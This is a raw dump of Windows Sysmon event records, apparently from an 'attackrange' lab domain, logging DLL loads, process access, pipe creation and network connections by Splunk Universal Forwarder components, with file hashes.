Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exeC:\Windows\System32\ucrtbase.dll10.0.14393.3659 (rs1_release_1.200410-1813)Microsoft® C Runtime LibraryMicrosoft® Windows® Operating SystemMicrosoft Corporationucrtbase.dllMD5=9804D130E8E7178738C2B9808091B427,SHA256=6053B7CC85846F15094475116A8C57BA89FE99FDD1978C54E8A7E2114E318FE3trueMicrosoft WindowsValid 734700x800000000000000057345980Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:08.525{8B6011A9-5B80-618E-47F3-04000000F101}5088C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exeC:\Program Files\SplunkUniversalForwarder\bin\ssleay32.dll1.0.2tOpenSSL Shared LibraryThe OpenSSL ToolkitThe OpenSSL Project, http://www.openssl.org/ssleay32.dllMD5=B20FA07A7A61791EE537B5945429E141,SHA256=EF53BC2AB58BC548EFA249B0B8F2E1FBB9D4739EF27B0C67DFF1468D555329D3trueSplunk, Inc.Valid 734700x800000000000000057345979Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:08.525{8B6011A9-5B80-618E-47F3-04000000F101}5088C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exeC:\Windows\System32\combase.dll10.0.14393.4583 (rs1_release.210730-1850)Microsoft COM for WindowsMicrosoft® Windows® Operating SystemMicrosoft CorporationCOMBASE.DLLMD5=878EBD02A580FDF8F187100127E6D3A8,SHA256=54E4BADDFBD97CFFF871B6D7316B28872218B92F37C41199F71EB37BC5634216trueMicrosoft WindowsValid 734700x800000000000000057345978Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:08.525{8B6011A9-5B80-618E-47F3-04000000F101}5088C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exeC:\Windows\System32\ole32.dll10.0.14393.4169 (rs1_release.210107-1130)Microsoft OLE for WindowsMicrosoft® Windows® Operating SystemMicrosoft CorporationOLE32.DLLMD5=676B0A1FB2A01D19AECB1F19883B6FC4,SHA256=56DEB219840DBAF9DAF645AD5D79AF9AB05F20E688382854DD487F440B257552trueMicrosoft WindowsValid 734700x800000000000000057345977Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:08.525{8B6011A9-5B80-618E-47F3-04000000F101}5088C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exeC:\Program Files\SplunkUniversalForwarder\bin\libxml2.dll2.9.9libxml2 librarylibxml2-libxml2.dllMD5=0E7B7B3B25A2F094EB3A7BAF471154B8,SHA256=6CFAC8D8D5B7345F2C6CC82CBF8F9DD475881EA260346BE283E52B822F2CCAC1trueSplunk, Inc.Valid 734700x800000000000000057345976Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:08.525{8B6011A9-5B80-618E-47F3-04000000F101}5088C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exeC:\Program Files\SplunkUniversalForwarder\bin\libxslt.dll-----MD5=B8D3119CE62331C6A9B170DA0A608F28,SHA256=7D6C6B7C542B4E67AA468FEB12044E2EE34CE8F8A68C7665D7861F3363B6E66AtrueSplunk, Inc.Valid 734700x800000000000000057345975Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:08.525{8B6011A9-5B80-618E-47F3-04000000F101}5088C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exeC:\Windows\System32\activeds.dll10.0.14393.4169 (rs1_release.210107-1130)ADs Router Layer DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationADsMD5=C62947CD1080E3B128B517AE91B22D6D,SHA256=6BB5D8967F822B5B1646DC9069212914D36C4D3D65E086AC0890B6A02112B438trueMicrosoft WindowsValid 734700x800000000000000057345974Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:08.525{8B6011A9-5B80-618E-47F3-04000000F101}5088C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exeC:\Windows\System32\ws2_32.dll10.0.14393.3241 (rs1_release_inmarket.190910-1801)Windows Socket 2.0 32-Bit DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationws2_32.dllMD5=06E82905620845A7C185BDEE85CC4140,SHA256=B75C9B080293F85568912BABE749F403144959206F9C6BAB36B628E8F77C5DA0trueMicrosoft WindowsValid 734700x800000000000000057345973Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:08.525{8B6011A9-5B80-618E-47F3-04000000F101}5088C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exeC:\Windows\System32\rpcrt4.dll10.0.14393.4467 (rs1_release.210604-1844)Remote Procedure Call RuntimeMicrosoft® Windows® Operating SystemMicrosoft Corporationrpcrt4.dllMD5=B0C4BF9491FB453B77399E3C56C11DC8,SHA256=66D5D1B3D25D15EA8737C8B2EF83E770BA10931868F24DCACC50936F0A0BAC08trueMicrosoft WindowsValid 734700x800000000000000057345972Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:08.525{8B6011A9-5B80-618E-47F3-04000000F101}5088C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exeC:\Windows\System32\sechost.dll10.0.14393.3808 (rs1_release.200707-2105)Host for SCM/SDDL/LSA Lookup APIsMicrosoft® Windows® Operating SystemMicrosoft Corporationsechost.dllMD5=E6B98644CD3B912C44C39CC0996790A9,SHA256=23BE56E1B8DBA449C0959753175BD15457EC88E93E9E8B86489266347959A6F2trueMicrosoft WindowsValid 734700x800000000000000057345971Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:08.525{8B6011A9-5B80-618E-47F3-04000000F101}5088C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exeC:\Windows\System32\msvcrt.dll7.0.14393.2457 (rs1_release_inmarket.180822-1743)Windows NT CRT DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationmsvcrt.dllMD5=0AF8989DD67A135B536CF948E3EFB7EB,SHA256=C693DA0EF4DCF3BC244661B9FD280FE12C3053FDD7B977712C0CF210831B2EF4trueMicrosoft WindowsValid 734700x800000000000000057345970Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:08.525{8B6011A9-5B80-618E-47F3-04000000F101}5088C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exeC:\Windows\System32\advapi32.dll10.0.14393.4467 (rs1_release.210604-1844)Advanced Windows 32 Base APIMicrosoft® Windows® Operating SystemMicrosoft Corporationadvapi32.dllMD5=A8CDCAC5C32D14ED8AADDF5489FC5D55,SHA256=140F07A8F6780DAFE20CC4FBE86C9332FB2F0C26ED8F49914BD05265C63EF6F1trueMicrosoft WindowsValid 734700x800000000000000057345969Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:08.525{8B6011A9-5B80-618E-47F3-04000000F101}5088C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exeC:\Windows\System32\gdi32full.dll10.0.14393.4530 (rs1_release.210705-0736)GDI Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationgdi32MD5=9D82D7DBC3D9E0D8E86D10A5B1BF736E,SHA256=270CA1A42ECB4C22E826C1C95924F0014CC99254AB55B7167DA144D45E238E6DtrueMicrosoft WindowsValid 734700x800000000000000057345968Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:08.525{8B6011A9-5B80-618E-47F3-04000000F101}5088C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exeC:\Windows\System32\gdi32.dll10.0.14393.4169 (rs1_release.210107-1130)GDI Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationgdi32MD5=551D603CEC947F586DB9FADEF4D2EBA6,SHA256=143125EFF9F3BC5B3F3BE505F3C3814393807B9CACB6AA5F75D39C77EC0D4ED8trueMicrosoft WindowsValid 734700x800000000000000057345967Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:08.525{8B6011A9-5B80-618E-47F3-04000000F101}5088C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exeC:\Windows\System32\win32u.dll10.0.14393.0 (rs1_release.160715-1616)Win32uMicrosoft® Windows® Operating SystemMicrosoft CorporationWin32u.DLLMD5=6A40F9C63B52CB4E8271CF3418618033,SHA256=A2BE23DA7AADFA9118130C939CD59D86E590957172FF404511EE6C5EC5147F15trueMicrosoft WindowsValid 734700x800000000000000057345966Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:08.525{8B6011A9-5B80-618E-47F3-04000000F101}5088C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exeC:\Windows\System32\user32.dll10.0.14393.4169 (rs1_release.210107-1130)Multi-User Windows USER API Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationuser32MD5=883B59C5557E8A9B3C1E1ED1CA48CD5A,SHA256=271800C20A96587265BF83DE2EFC11329EEB2B6C0D57E5E0BCD137FB96BFE6E3trueMicrosoft WindowsValid 10341000x800000000000000057345965Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:08.525{8B6011A9-BB8B-618B-50A0-04000000F101}92124768C:\Windows\system32\conhost.exe{8B6011A9-5B80-618E-47F3-04000000F101}5088C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 734700x800000000000000057345964Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:08.525{8B6011A9-5B80-618E-47F3-04000000F101}5088C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exeC:\Windows\System32\KernelBase.dll10.0.14393.4350 (rs1_release.210407-2154)Windows NT BASE API Client DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationKernelbase.dllMD5=0F627827D9CFFA8E0BCF30F013FB7209,SHA256=EA47C3E471801ACA92EE449C66CF785EA670ADE92A5A2D5CDB81C93DD72ABEF0trueMicrosoft WindowsValid 734700x800000000000000057345963Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:08.525{8B6011A9-5B80-618E-47F3-04000000F101}5088C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exeC:\Windows\System32\kernel32.dll10.0.14393.4350 (rs1_release.210407-2154)Windows NT BASE API Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationkernel32MD5=A5AD62615D2361BFAEC6C047B199184C,SHA256=B43F3DFDAF7BAA7A2B97015631F96CE429C50348D380080CFC29C36F959D7886trueMicrosoft WindowsValid 734700x800000000000000057345962Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:08.525{8B6011A9-5B80-618E-47F3-04000000F101}5088C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exeC:\Windows\System32\ntdll.dll10.0.14393.4530 (rs1_release.210705-0736)NT Layer DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationntdll.dllMD5=36B87C41EE39F3051D116F735EBEF866,SHA256=9C45BAE6D7E27B3AE04BBF88B96686C04ED6A43695558E82B687013BA0383F8AtrueMicrosoft WindowsValid 734700x800000000000000057345961Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:08.525{8B6011A9-5B80-618E-47F3-04000000F101}5088C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exeC:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe8.0.2Windows Print Monitor splunk ApplicationSplunk Inc.splunk-winprintmon.exeMD5=36D3753920C5BBCA16D12DEAD7A3A904,SHA256=EA17F69FB116CFA6ADC3CE07EBBAE3FD2CB221F25E3F7A9ADF3F15DA051831E2trueSplunk, Inc.Valid 10341000x800000000000000057345960Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:08.525{8B6011A9-8868-6164-0500-00000000F101}424440C:\Windows\system32\csrss.exe{8B6011A9-5B80-618E-47F3-04000000F101}5088C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000057345959Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:08.525{8B6011A9-BB8A-618B-4CA0-04000000F101}74521152C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{8B6011A9-5B80-618E-47F3-04000000F101}5088C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x800000000000000057345958Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:08.511{8B6011A9-5B80-618E-47F3-04000000F101}5088C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe8.0.2Windows Print Monitor splunk ApplicationSplunk Inc.splunk-winprintmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{8B6011A9-886B-6164-E703-000000000000}0x3e70SystemMD5=36D3753920C5BBCA16D12DEAD7A3A904,SHA256=EA17F69FB116CFA6ADC3CE07EBBAE3FD2CB221F25E3F7A9ADF3F15DA051831E2{8B6011A9-BB8A-618B-4CA0-04000000F101}7452C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 18141800x800000000000000057345957Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-ConnectPipe2021-11-12 12:18:08.510{8B6011A9-BB8A-618B-4CA0-04000000F101}7452<Anonymous Pipe>C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe 17141700x800000000000000057345956Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreatePipe2021-11-12 12:18:08.510{8B6011A9-BB8A-618B-4CA0-04000000F101}7452<Anonymous Pipe>C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe 18141800x800000000000000057345955Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-ConnectPipe2021-11-12 12:18:08.510{8B6011A9-BB8A-618B-4CA0-04000000F101}7452<Anonymous Pipe>C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe 17141700x800000000000000057345954Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreatePipe2021-11-12 12:18:08.510{8B6011A9-BB8A-618B-4CA0-04000000F101}7452<Anonymous Pipe>C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe 18141800x800000000000000057345953Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-ConnectPipe2021-11-12 12:18:08.510{8B6011A9-BB8A-618B-4CA0-04000000F101}7452<Anonymous Pipe>C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe 17141700x800000000000000057345952Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreatePipe2021-11-12 12:18:08.510{8B6011A9-BB8A-618B-4CA0-04000000F101}7452<Anonymous Pipe>C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe 11241100x800000000000000057345951Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:08.292{8B6011A9-BB9D-618B-83A0-04000000F101}5620C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_Operational2021-09-16 14:18:25.134 23542300x800000000000000057345950Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:08.291{8B6011A9-BB9D-618B-83A0-04000000F101}5620NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=9836E192351629353FF64E20E45C149D,SHA256=BBDC4C7D8F0E2D4E403A670A7EB3BC4896854D05A5348819F8EC03F227DEDE9Cfalsetrue 354300x800000000000000057345949Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:38.541{8B6011A9-BB96-618B-7AA0-04000000F101}7856C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-469.attackrange.local54558-false10.0.1.12ip-10-0-1-12.us-west-2.compute.internal8000- 354300x800000000000000057345948Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:38.495{8B6011A9-891D-6164-C500-00000000F101}2944C:\Windows\System32\rundll32.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-469.attackrange.local54557-false34.218.235.219ec2-34-218-235-219.us-west-2.compute.amazonaws.com443https 10341000x800000000000000021219742Microsoft-Windows-Sysmon/Operationalwin-host-874.attackrange.local-2021-11-12 12:18:08.331{AD5E2759-54C7-6143-AA00-00000000F101}35682904C:\Windows\system32\conhost.exe{AD5E2759-5B80-618E-10CE-08000000F101}1340C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000021219741Microsoft-Windows-Sysmon/Operationalwin-host-874.attackrange.local-2021-11-12 12:18:08.331{AD5E2759-5433-6143-0C00-00000000F101}7325636C:\Windows\system32\svchost.exe{AD5E2759-5434-6143-1F00-00000000F101}1140C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000021219740Microsoft-Windows-Sysmon/Operationalwin-host-874.attackrange.local-2021-11-12 12:18:08.331{AD5E2759-5433-6143-0C00-00000000F101}7325636C:\Windows\system32\svchost.exe{AD5E2759-5434-6143-1F00-00000000F101}1140C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000021219739Microsoft-Windows-Sysmon/Operationalwin-host-874.attackrange.local-2021-11-12 12:18:08.331{AD5E2759-5433-6143-0C00-00000000F101}7325636C:\Windows\system32\svchost.exe{AD5E2759-5434-6143-1F00-00000000F101}1140C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000021219738Microsoft-Windows-Sysmon/Operationalwin-host-874.attackrange.local-2021-11-12 12:18:08.331{AD5E2759-5433-6143-0C00-00000000F101}7325636C:\Windows\system32\svchost.exe{AD5E2759-5434-6143-1F00-00000000F101}1140C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000021219737Microsoft-Windows-Sysmon/Operationalwin-host-874.attackrange.local-2021-11-12 12:18:08.331{AD5E2759-5432-6143-0500-00000000F101}412528C:\Windows\system32\csrss.exe{AD5E2759-5B80-618E-10CE-08000000F101}1340C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000021219736Microsoft-Windows-Sysmon/Operationalwin-host-874.attackrange.local-2021-11-12 12:18:08.331{AD5E2759-54C7-6143-A600-00000000F101}4072516C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{AD5E2759-5B80-618E-10CE-08000000F101}1340C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x800000000000000021219735Microsoft-Windows-Sysmon/Operationalwin-host-874.attackrange.local-2021-11-12 12:18:08.316{AD5E2759-5B80-618E-10CE-08000000F101}1340C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe10.0.10011.16384SplunkMonNoHandle Control ProgramWindows (R) Win 7 DDK driverWindows (R) Win 7 DDK providerSplunkMonNoHandle.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{AD5E2759-5432-6143-E703-000000000000}0x3e70SystemMD5=BF28C74E12839E40CD89696C7CB01573,SHA256=6187325F302F232DE582FE28E0E0D2B292AB8122C3356C9CE295A482D7B93EA3,IMPHASH=27776F2813155A6CF34F6A075A0C2EC8{AD5E2759-54C7-6143-A600-00000000F101}4072C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 534500x800000000000000057345947Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:08.025{8B6011A9-5B7F-618E-46F3-04000000F101}5676C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe 734700x800000000000000057345946Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:08.025{8B6011A9-5B7F-618E-46F3-04000000F101}5676C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exeC:\Windows\System32\kernel.appcore.dll10.0.14393.2312 (rs1_release.180607-1919)AppModel API HostMicrosoft® Windows® Operating SystemMicrosoft Corporationkernel.appcore.dllMD5=0AF5EF8A7FEFD4B37036B71514FC20CF,SHA256=D4F178583F6F33794D42B4DB11008494E9CD9F069C2AD2CA304DA63F9B5F659CtrueMicrosoft WindowsValid 734700x800000000000000057345945Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:08.025{8B6011A9-5B7F-618E-46F3-04000000F101}5676C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exeC:\Windows\System32\dbgcore.dll10.0.14321.1024 (debuggers(dbg).210127-1811)Windows Core Debugging HelpersMicrosoft® Windows® Operating SystemMicrosoftDBGCORE.DLLMD5=72E8FEC8419AB470FB737883463688FE,SHA256=1DA7D2D2D1C4E6EC17101A4997C4AA610818730D63C72C1D2084ABA3F25C5146trueMicrosoft WindowsValid 734700x800000000000000057345944Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:08.025{8B6011A9-5B7F-618E-46F3-04000000F101}5676C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exeC:\Windows\System32\dbghelp.dll10.0.14321.1024 (rs1_release.160715-1616)Windows Image HelperMicrosoft® Windows® Operating SystemMicrosoftDBGHELP.DLLMD5=2C92DF5D32661FB4B81B08B72B2102A7,SHA256=BCEF4DEBDE7D8D6916EE3D3E5E63A725E03A058AABCD7DD49DF9D48B16E96D1AtrueMicrosoft WindowsValid 10341000x800000000000000021219762Microsoft-Windows-Sysmon/Operationalwin-host-874.attackrange.local-2021-11-12 12:18:09.956{AD5E2759-5B81-618E-12CE-08000000F101}35963928C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{AD5E2759-54C7-6143-A600-00000000F101}4072C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program 